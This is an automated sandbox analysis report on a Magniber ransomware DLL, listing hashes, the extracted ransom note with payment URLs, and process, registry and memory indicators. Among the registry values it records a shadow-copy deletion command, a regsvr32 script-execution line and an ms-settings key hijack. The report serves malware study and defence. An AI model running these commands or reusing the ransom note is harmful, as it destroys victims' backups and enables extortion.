magniber | 2cd5879589f6af26488a2c9451d279306c472302375916e34f2646e7095ce4b9

Analysis

max time kernel
73s
max time network
166s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2023 06:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cbf762fb16cfe0149b46a61f3fb029fd.dll
Size

38KB
MD5

cbf762fb16cfe0149b46a61f3fb029fd
SHA1

24d70407e12631bd83f39164bcd5ca6a74a0b459
SHA256

2cd5879589f6af26488a2c9451d279306c472302375916e34f2646e7095ce4b9
SHA512

e26dd9fcb24b7357da2230c87d6ee7ed59f1288118160b42d92161a42e77a91077a8a9c6b9ab49a68f6cdf7135d57be3a465190118112d1c0a49e7408b28a853
SSDEEP

768:tNB4vRN8egwET/AOBHR9T7lGFDZFpVNKu90lQtwPFhXB+6OPvF65IM0:5A8ugn5T7le1l1Gb+6OPvdM

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://4604a6b87eac8a3024awbcrke.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/awbcrke Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://4604a6b87eac8a3024awbcrke.hegame.xyz/awbcrke http://4604a6b87eac8a3024awbcrke.tietill.space/awbcrke http://4604a6b87eac8a3024awbcrke.hesmust.top/awbcrke http://4604a6b87eac8a3024awbcrke.salecup.club/awbcrke Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://4604a6b87eac8a3024awbcrke.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/awbcrke

http://4604a6b87eac8a3024awbcrke.hegame.xyz/awbcrke

http://4604a6b87eac8a3024awbcrke.tietill.space/awbcrke

http://4604a6b87eac8a3024awbcrke.hesmust.top/awbcrke

http://4604a6b87eac8a3024awbcrke.salecup.club/awbcrke

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/4612-0-0x0000025DB5D10000-0x0000025DB6648000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 50 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4252	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4332	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5156	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5280	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5420	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2664	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4636	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4312	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3348	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3732	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4952	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5692	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1000	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5140	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5152	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4212	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5156	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5412	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4952	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5180	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5900	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3480	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5232	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5216	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3596	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5484	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5424	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3816	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3376	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	220	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1268	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3108	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5484	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5796	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	768	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1268	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3128	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6064	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1600	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1176	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4140	3068	cmd.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5980	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5932	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	3068	vssadmin.exe	115
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3376	3068	vssadmin.exe	115

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (73) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	wmic.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	wmic.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	WMIC.exe

Suspicious use of SetThreadContext 17 IoCs

description	pid	Process	procid_target
PID 4612 set thread context of 2760	4612	rundll32.exe	62
PID 4612 set thread context of 2792	4612	rundll32.exe	61
PID 4612 set thread context of 2928	4612	rundll32.exe	59
PID 4612 set thread context of 3428	4612	rundll32.exe	54
PID 4612 set thread context of 3584	4612	rundll32.exe	53
PID 4612 set thread context of 3808	4612	rundll32.exe	52
PID 4612 set thread context of 3908	4612	rundll32.exe	51
PID 4612 set thread context of 3972	4612	rundll32.exe	25
PID 4612 set thread context of 4052	4612	rundll32.exe	50
PID 4612 set thread context of 3712	4612	rundll32.exe	49
PID 4612 set thread context of 4644	4612	rundll32.exe	47
PID 4612 set thread context of 3124	4612	rundll32.exe	37
PID 4612 set thread context of 3860	4612	rundll32.exe	27
PID 4612 set thread context of 4592	4612	rundll32.exe	32
PID 4612 set thread context of 4444	4612	rundll32.exe	31
PID 4612 set thread context of 2460	4612	rundll32.exe
PID 4612 set thread context of 4640	4612	rundll32.exe	87

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	backgroundTaskHost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	backgroundTaskHost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 30 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
5484	vssadmin.exe
5156	vssadmin.exe
4252	vssadmin.exe
4312	vssadmin.exe
3348	vssadmin.exe
2936	vssadmin.exe
3128	vssadmin.exe
1268	vssadmin.exe
5796	vssadmin.exe
1268	vssadmin.exe
5980	vssadmin.exe
5156	vssadmin.exe
2664	vssadmin.exe
4952	vssadmin.exe
5152	vssadmin.exe
5932	vssadmin.exe
3376	vssadmin.exe
4636	vssadmin.exe
5900	vssadmin.exe
3376	vssadmin.exe
4912	vssadmin.exe
3480	vssadmin.exe
5216	vssadmin.exe
5692	vssadmin.exe
6088	vssadmin.exe
768	vssadmin.exe
1000	vssadmin.exe
5232	vssadmin.exe
3596	vssadmin.exe
220	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\IESettingSync	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies registry class 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings\MuiCache	backgroundTaskHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	backgroundTaskHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2072	notepad.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4612	rundll32.exe
4612	rundll32.exe
1824	msedge.exe
1824	msedge.exe
1756	msedge.exe
1756	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3428	Explorer.EXE
2928	taskhostw.exe

Suspicious behavior: MapViewOfSection 17 IoCs

pid	Process
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2292	wmic.exe
Token: SeSecurityPrivilege	2292	wmic.exe
Token: SeTakeOwnershipPrivilege	2292	wmic.exe
Token: SeLoadDriverPrivilege	2292	wmic.exe
Token: SeSystemProfilePrivilege	2292	wmic.exe
Token: SeSystemtimePrivilege	2292	wmic.exe
Token: SeProfSingleProcessPrivilege	2292	wmic.exe
Token: SeIncBasePriorityPrivilege	2292	wmic.exe
Token: SeCreatePagefilePrivilege	2292	wmic.exe
Token: SeBackupPrivilege	2292	wmic.exe
Token: SeRestorePrivilege	2292	wmic.exe
Token: SeShutdownPrivilege	2292	wmic.exe
Token: SeDebugPrivilege	2292	wmic.exe
Token: SeSystemEnvironmentPrivilege	2292	wmic.exe
Token: SeRemoteShutdownPrivilege	2292	wmic.exe
Token: SeUndockPrivilege	2292	wmic.exe
Token: SeManageVolumePrivilege	2292	wmic.exe
Token: 33	2292	wmic.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
3428	Explorer.EXE
3428	Explorer.EXE
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe
1756	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3428 wrote to memory of 2072	3428	Explorer.EXE	98
PID 3428 wrote to memory of 2072	3428	Explorer.EXE	98
PID 3428 wrote to memory of 916	3428	Explorer.EXE	99
PID 3428 wrote to memory of 916	3428	Explorer.EXE	99
PID 3428 wrote to memory of 2292	3428	Explorer.EXE	100
PID 3428 wrote to memory of 2292	3428	Explorer.EXE	100
PID 3428 wrote to memory of 60	3428	Explorer.EXE	101
PID 3428 wrote to memory of 60	3428	Explorer.EXE	101
PID 3428 wrote to memory of 1976	3428	Explorer.EXE	103
PID 3428 wrote to memory of 1976	3428	Explorer.EXE	103
PID 1976 wrote to memory of 4476	1976	cmd.exe	107
PID 1976 wrote to memory of 4476	1976	cmd.exe	107
PID 60 wrote to memory of 2408	60	cmd.exe	108
PID 60 wrote to memory of 2408	60	cmd.exe	108
PID 3972 wrote to memory of 4920	3972	RuntimeBroker.exe	109
PID 3972 wrote to memory of 4920	3972	RuntimeBroker.exe	109
PID 3972 wrote to memory of 4280	3972	RuntimeBroker.exe	114
PID 3972 wrote to memory of 4280	3972	RuntimeBroker.exe	114
PID 3972 wrote to memory of 1080	3972	RuntimeBroker.exe	110
PID 3972 wrote to memory of 1080	3972	RuntimeBroker.exe	110
PID 916 wrote to memory of 1756	916	cmd.exe	116
PID 916 wrote to memory of 1756	916	cmd.exe	116
PID 4280 wrote to memory of 4812	4280	cmd.exe	118
